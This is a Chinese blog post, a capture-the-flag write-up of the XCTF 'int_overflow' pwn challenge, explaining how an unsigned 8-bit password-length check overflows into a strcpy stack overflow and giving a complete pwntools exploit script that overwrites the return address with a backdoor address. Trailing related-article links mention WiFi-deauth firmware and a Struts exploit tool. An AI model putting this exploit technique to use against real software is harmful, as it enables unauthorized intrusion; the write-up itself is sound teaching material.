PWN做题笔记2-int_overflow(已校对)

已于 2023-03-11 17:56:54 修改
阅读量239 收藏 2
点赞数
文章标签: 系统安全
于 2022-04-19 17:22:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/124278299
版权

原题地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=1

 

如图,程序是一个32位ELF文件

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 chesec,开启了栈保护

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

ida反编译,main方法中实现了登录功能,无溢出点

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16

 login方法中输入用户名和密码:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_10,color_FFFFFF,t_70,g_se,x_16

 这里位数上0x19<40,0x199<512,因此无溢出

check_passwd实现对密码长度进行检查:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_12,color_FFFFFF,t_70,g_se,x_16

 密码长度为4-8之间,是一个uint8,范围为0-255

由于255<密码长度0x199,因此存在整数溢出,令密码长度在259-263之间即可顺利赋值给dest,dest没有长度检查,存在栈溢出漏洞

 

后门函数在这里 

52f47181abdb4bfc8e5480cc7ad588c7.png

地址为:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_14,color_FFFFFF,t_70,g_se,x_16

 溢出点栈帧结构:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_11,color_FFFFFF,t_70,g_se,x_16

 因此不考虑密码位数时构造b“A”*(0x14+4)*A+0x0804868B长度(0x14+4)+4

令密码长度构造为262位,262-(0x14+4)-4=234,还需填充234位

因此密码填写:b“A”*(0x14+4)+0x0804868B+b"A"*234

代码如下所示:

from pwn import *
host = '111.200.241.244'
port = 55687

p = connect(host, port)
payload = b'A' * (0x14 + 4) + p32(0x804868B)+b'A'*234
p.sendlineafter("Your choice:", '1')
p.sendlineafter("Please input your username:\n", "111")
p.sendlineafter("Please input your passwd:\n", payload)
p.interactive()

如图,获取成功

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAX2FscGFjYV8=,size_20,color_FFFFFF,t_70,g_se,x_16

 

_alpaca_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2055
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
int_overflow
weixin_45846085的博客
05-24 402
1.程序检查 下载附件,checksec一下检查文件保护 只打开了NX保护,栈不可以执行 运行一下程序选择,整个程序功能就是输入一个名字和密码 查看一下程序当中引用的字符串,我们发现了一个cat flag 2.流程分析 使用神器IDA ,查看程序整体逻辑。 在what_is_this函数中发现cat flag,我们的目标就是控制程序去执行,what_is_this这个函数。 这里程序的漏洞很明显strcpy是可以栈溢出的地方 这边我们就可以进行栈溢出。 但是这个程序有一个密码长度检查,那么
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1850
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
int_overflow(xctf)
weixin_43868725的博客
05-06 568
0x0 程序保护和流程 保护: 流程: main() login() check_passwd() 分析流程可知当我们输入的passwd的长度在3~7之间时可以将passwd复制到dest中。而用来储存passwd的长度的变量是无符号的int8。int8能储存的最大值是255。超过255就会回到0。 0x1 漏洞利用 根据判断可以将passwd的长度控制在259~263之间就可以完成利用了...
攻防世界-int_overflow
qq_45771413的博客
04-27 295
查看保护 IDA 先查看字符串搜索下有无可利用字符串,找到了cat flag。进入发现直接是system cat flag。看来只需要跳转到这个地址就可以了(0x8048694) 开始只能选择1.login登录,进入后提示输入用户名和密码。这里用户名限制死25位,没有操作空间,密码可以输入409位,插个眼。 最后还有个check passwd函数: 判断输入函数长度是否大于3小于8 然后将输入的密码拷贝给dest。 题目提示int_overstack,明晃晃地告诉我是整型溢出。我的关注重点就放在in
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
攻防世界-pwn新手区-int_overflow
CHAWUCIREN1的博客
08-10 267
看题目就知道是整形溢出 运行一下 检查一下保护机制 丢入32位ida里面 发现一个函数 可以通过覆盖跳转到这个函数就可以拿到flag system_addr = 0x804868B check_passwd处有一个判定,输入的数字要在3和8之间否则就直接退出 在这里需要说明一下,这个unsigned int就是无符号的整型,我们要知道,在计算机中,所有的数据指令都是以二进制的形式存在的,010101这样,那么正负数怎么存在呢,这里就有一个符号位,一般是在一段数据的第一个位置 比如260的十六进制
攻防世界_pwn int_overflow(萌新版)
TedLau的博客
02-24 486
首发于鄙人博客:传送门 0x00 前言 重刷攻防世界,本人纯萌新,在本次刷题过程中,不能再想之前那样,做过就忘,我打算将我的思路尽可能的写成文章发在网站。 0x10 步骤 file与checksec步骤已省略 根据反汇编的意思,便可以知道buf的长度比dest的长度长,所以在strcpy的时候会发生溢出现象。 而如果我们的s的长度在3和8之间,那么我们便无法使得s...
day-9 xctf-int_overflow
a525024162806525的博客
09-29 343
xctf-int_overflow 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5058&page=undefined checksec文件,No canary found,32位程序: 用ida打开查看: 判断输入,选择功能菜单:1...
int_overflow writeup
ditto的博客
01-06 917
做了半天,没注意是整型溢出。。。 拿到题目检查下防护: 随便运行下: 放到ida里看下: 题目对输入的password的长度进行了检查,只能在4到8范围内。 在strcpy处有溢出,想要进行溢出就必须绕过v3的检查。 发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以...
int_overflow--writeup
ATFWUS的博客
03-02 614
文件下载地址: 链接:https://pan.baidu.com/s/1RiL_dBXGdIRsz76Nw0Mj2w 提取码:s8sy 目录 0x01.分析 checksec: 看下源码: 理清一下流程: 寻找一下漏洞: 利用漏洞攻击: 0x02.exp 0x01.分析 checksec: 32位程序,开启了NX。 看下源码: 理清一下流程:...
攻防世界 int_overflow 超超超详细
PushSafe
10-23 2656
pwn纯新手教程 如有错误的地方 希望各位大佬们指出. 整数溢出 int_overflow 整数分为有符号(int)和无符号(unsigned int)两种类型 有符号数以最高位作为其符号位 即正整数最高位为 1,负数为 0 无符号数取值范围为非负数 常见各类型占用字节数如下: 类型 字节 取值范围 int 4 -2147483648~2147483647 short int 2
[攻防世界]int_overflow~巨细讲解
逆向萌新的博客
06-01 404
[攻防世界]int_overflow巨细
2019.7.20 功放世界int_overflow
DSR446的博客
07-24 256
① ② ③这里 read也存在一个栈溢出的漏洞,请自己尝试是否可以从这里入手() ④strcpy的作用是将后面s中字符串拷贝到前面&dest中去。 ⑤发现v3是8位无符号整数,则最大只能是255。 但是read函数能读取的长度是0x199,远大于255,那就可以进行整型溢出,让passwd的长度是 260到264就可以了。(260264是理论上的,但实操中是259263,我还没弄清除...
pwn刷题num4---整数溢出上溢+栈溢出
tbsqigongzi的博客
04-21 815
攻防世界pwn新手区int_overflow 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO---got表仍可写 未开启canary保护---存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 程序运行后让我们选择login(登陆)或exit(退出) 选1,之后输入username(用户名),之后输入passwd(密码),最后只给我们一个success 直接ida看伪代码
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要集中在如何通过精心构造payload来控制程序的执行流,尤其是针对ARM架构的程序。 首先,提到的"publicvuln...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值